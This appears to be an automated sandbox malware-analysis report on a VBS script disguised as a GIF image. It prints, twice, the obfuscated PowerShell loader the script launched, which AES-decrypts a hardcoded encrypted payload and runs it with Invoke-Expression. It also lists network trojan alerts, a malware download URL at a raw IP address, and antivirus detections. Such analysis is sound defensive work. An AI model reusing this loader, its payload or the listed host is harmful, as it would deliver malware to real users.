        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs", ProcessId: 2104, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
        No Snort rule has matched
        Timestamp:2024-07-27T13:32:04.617105+0200
        SID:2049038
        Source Port:80
        Destination Port:49710
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-27T13:32:03.542554+0200
        SID:2047750
        Source Port:80
        Destination Port:49710
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-27T13:32:58.433240+0200
        SID:2022930
        Source Port:443
        Destination Port:59210
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-07-27T13:32:18.934584+0200
        SID:2022930
        Source Port:443
        Destination Port:49715
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://198.46.176.133/Upload/vbs.jpegAvira URL Cloud: Label: malware
        Source: http://198.46.176.133/Upload/vbs.jpegVirustotal: Detection: 19%Perma Link
        Source: http://198.46.176.133Virustotal: Detection: 13%Perma Link
        Source: creatednewwaterbottleforme.gIF.vbsVirustotal: Detection: 10%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: omation.pdb source: powershell.exe, 00000002.00000002.2311562493.000001242A3DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 00000002.00000002.2311562493.000001242A370000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2309336237.000001242A070000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb- source: powershell.exe, 00000002.00000002.2311562493.000001242A370000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.2309336237.000001242A070000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
